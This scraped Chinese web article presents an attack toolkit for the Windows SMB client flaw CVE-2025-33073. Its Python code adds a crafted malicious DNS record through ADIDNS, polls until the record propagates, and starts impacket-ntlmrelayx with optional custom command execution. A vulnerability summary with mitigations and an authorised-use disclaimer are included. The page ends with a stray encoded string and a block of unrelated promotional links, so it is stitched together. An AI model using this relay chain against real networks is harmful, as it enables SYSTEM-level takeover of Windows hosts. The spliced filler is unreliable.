当前位置: 首页 > news >正文

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

项目描述

该项目是一个针对Windows SMB客户端远程代码执行漏洞CVE-2025-33073的安全研究与渗透测试工具集。该漏洞被标记为高危(CVSS 8.8分),影响Windows 10、11及Server 2012-2025的所有版本,允许攻击者在经过身份验证的情况下通过网络实现SYSTEM级别的远程代码执行。工具集包含DNS记录操作和NTLM中继攻击功能,用于模拟和测试相关攻击场景。

功能特性

  • DNS记录操作:通过dnstool.py工具添加恶意DNS记录,支持ADIDNS over LDAP交互
  • NTLM中继攻击:利用impacket-ntlmrelayx工具发起SMB中继攻击,支持自定义命令执行
  • DNS传播监控:自动检测DNS记录是否已成功传播,支持超时控制
  • 多终端支持:可在当前终端或新xterm窗口中启动监听器
  • Kerberos集成:支持Kerberos身份验证,可与LDAP服务交互
  • 漏洞利用辅助:专门针对CVE-2025-33073漏洞的利用环境搭建

安装指南

系统要求

  • Python 3.x
  • impacket库
  • ldap3库
  • dnspython库
  • xterm(如需在新窗口中启动监听器)

依赖安装

pipinstallimpacket ldap3 dnspython

在Linux/macOS上安装

# 克隆相关工具gitclone<repository-url>cd<project-directory># 确保脚本有执行权限chmod+x *.py# 安装系统依赖(Debian/Ubuntu)sudoapt-getinstallxtermdig

使用说明

基础使用示例

#!/usr/bin/env python3importshleximportsysimportargparseimportsubprocessimporttime# 静态DNS记录常量STATIC_DNS_RECORD="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"defrun_dnstool(user,password,attacker_ip,dns_ip,dc_fqdn):""" 使用dnstool.py添加恶意DNS记录 """print("[*] Adding malicious DNS record using dnstool.py...")dnstool_cmd=["python3","dnstool.py","-u",user,"-p",password,"-a","add","-r",STATIC_DNS_RECORD,"-d",attacker_ip,"-dns-ip",dns_ip,dc_fqdn]subprocess.run(dnstool_cmd,check=True)print("[+] DNS record added.")

监控DNS记录传播

defwait_for_dns_record(record,dns_ip,timeout=60):""" 等待DNS记录传播并验证 """timeout=int(timeout)print(f"[*] Waiting for DNS record{record}to propagate...")start_time=time.time()whiletime.time()-start_time<timeout:try:result=subprocess.run(["dig","+short",record,f"@{dns_ip}"],capture_output=True,text=True)ifresult.stdout.strip():print("[+] DNS record is live.")returnTrueexceptExceptionase:print(f"[!] Error checking DNS record:{e}")time.sleep(2)print("[!] Timeout reached. DNS record not found.")returnFalse

启动NTLM中继监听器

defstart_ntlmrelayx(target,cli_only=False,custom_command=None,socks=False):""" 启动impacket-ntlmrelayx监听器 """ifcli_only:print("[*] Starting ntlmrelayx listener in this terminal...")ifcustom_command:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.append("-socks")returnsubprocess.Popen(cmd)else:print("[*] Starting ntlmrelayx listener in a new xterm...")ifcustom_command:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.insert(-1,"-socks")returnsubprocess.Popen(cmd)

核心代码

DNS工具核心功能

#!/usr/bin/env python""" ADIDNS over LDAP交互工具 Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) """importsysimportargparseimportgetpassimportreimportosimportsocketfromstructimportunpack,packfromimpacket.structureimportStructurefromimpacket.krb5.ccacheimportCCachefromimpacket.krb5.kerberosv5importgetKerberosTGT,getKerberosTGSfromimpacket.krb5.typesimportPrincipalfromimpacket.krb5importconstantsfromldap3importNTLM,Server,Connection,ALL,LEVEL,BASE,MODIFY_DELETE,MODIFY_ADD,MODIFY_REPLACE,SASL,KERBEROSfromlib.utils.kerberosimportldap_kerberosimportldap3fromimpacket.ldapimportldaptypesimportdns.resolverimportdatetimedefprint_m(string):"""打印消息"""sys.stderr.write('\033[94m[-]\033[0m %s\n'%(string))defprint_o(string):"""打印成功信息"""sys.stderr.write('\033[92m[+]\033[0m %s\n'%(string))defprint_f(string):"""打印失败信息"""sys.stderr.write('\033[91m[!]\033[0m %s\n'%(string))

漏洞信息结构

# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨# 🔥 High-Severity Authenticated Remote Code Execution 🔥# Improper Access Control in Windows SMB Client (CWE-284)# 🛡️ 关键信息概览""" CVSS v3.1评分: 8.8 (高危) 受影响系统: Windows 10, 11, Server 2012–2025 (所有版本) 披露日期: 2025年6月10日 (已在2025年6月补丁星期二修复) 攻击向量: 网络 (需身份验证) 影响: SYSTEM级别代码执行,通过Kerberos中继进行横向移动 绕过: NTLM反射缓解措施 """# 🛠️ 立即缓解措施""" 1. 立即打补丁! → 应用Microsoft更新 (例如 KB5060998) → Microsoft更新指南: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 2. 启用SMB签名 → 在所有客户端和服务器上强制执行 → 使用命令: Set-SmbClientConfiguration -RequireSecuritySignature $true 3. 限制NTLM使用 → 尽可能阻止NTLM → 使用EDR工具监控中继尝试 4. 为什么这个漏洞重要? - 绕过传统的NTLM保护 - 即使在SMB签名未强制执行的情况下也能工作 - 在配置不当的AD环境中实现完整的域接管 """

该工具集专门设计用于安全研究人员和渗透测试人员,以了解和防御CVE-2025-33073漏洞的相关攻击。请仅在授权测试环境中使用这些工具。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5IUcd+bvYYh2w++QDLvscF
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

http://www.jsqmd.com/news/345156/

相关文章:

  • 第2章 产品掌舵人崛起的历史脉络与核心价值
  • 如何为不同运营场景选充电桩?2026年充电桩品牌全面推荐与评价,直击成本与稳定性痛点 - 品牌推荐
  • 欧派木门联系方式:产品咨询与使用指南参考 - 品牌推荐
  • 盘点广东洗护套装加工厂年度排名,性价比高的有哪些 - 工业推荐榜
  • 2026年充电桩品牌推荐:智能充电趋势年度排名,涵盖家用与应急场景核心痛点解析 - 品牌推荐
  • 分析高功率激光焊接机价格,哪家费用更合理 - mypinpai
  • 2026年展厅自主充电机器人技术深度解析与主流产品选型指南 - 智造出海
  • 与Python入门教程:快速学习路径与就业方向指南
  • 只是随手写下了想你
  • *D2L Brightspace
  • OFTP2系列之三:Odette 标准核心业务流程与报文交互
  • 开题报告 springboot和vue_校内闲置书籍交易网站 二手书交易系统
  • 2026年北京婚礼策划公司推荐:全景式市场趋势排名,涵盖定制化与标准化服务痛点 - 品牌推荐
  • 2007-2024年上市公司高管绿色认知数据
  • 2026年北京黄金回收店联系电话推荐:安全回收必备联系清单 - 品牌推荐
  • 百泰派克生物科技:SDS PAGE凝胶电泳客户案例
  • 如何为多场景选择充电桩?2026年充电桩品牌全面评价与推荐,直击运维与成本痛点 - 品牌推荐
  • 一篇搞定全流程 8个AI论文软件测评:本科生毕业论文+科研写作全攻略
  • 2026年靠谱的排水管设备/芯模振动排水管设备厂家实力参考 - 行业平台推荐
  • 2026年充电桩品牌推荐:光储充一体化趋势评测,涵盖商用与应急场景电网协同痛点 - 品牌推荐
  • 2026年北京黄金回收店联系电话推荐:权威机构盘点与联系指引 - 品牌推荐
  • 充电桩运营哪个品牌更可靠?2026年充电桩品牌推荐与排名,解决长期维护与平台稳定性痛点 - 品牌推荐
  • 照着用就行:9个AI论文网站深度测评,专科生毕业论文写作必备工具推荐
  • 如何为不同运营场景选充电桩品牌?2026年充电桩全面评测与推荐,直击成本与稳定痛点 - 品牌推荐
  • 分析适合学生备考的无糖草本能量饮料,靠谱品牌有哪些 - myqiye
  • Windos 10系统安装OpenPose的CPU版本过程说明和Release版本直接使用 - 教程
  • 欧派木门联系方式:了解品牌背景与联系方式的途径 - 品牌推荐
  • 2026年热门的提花舒棉绒/舒棉绒新厂实力推荐(更新) - 行业平台推荐
  • 分析诺达机械性价比好不好,和其他品牌比费用差多少? - 工业推荐榜
  • 2026年品牌营销策划公司联系电话推荐:核心联系渠道一览 - 品牌推荐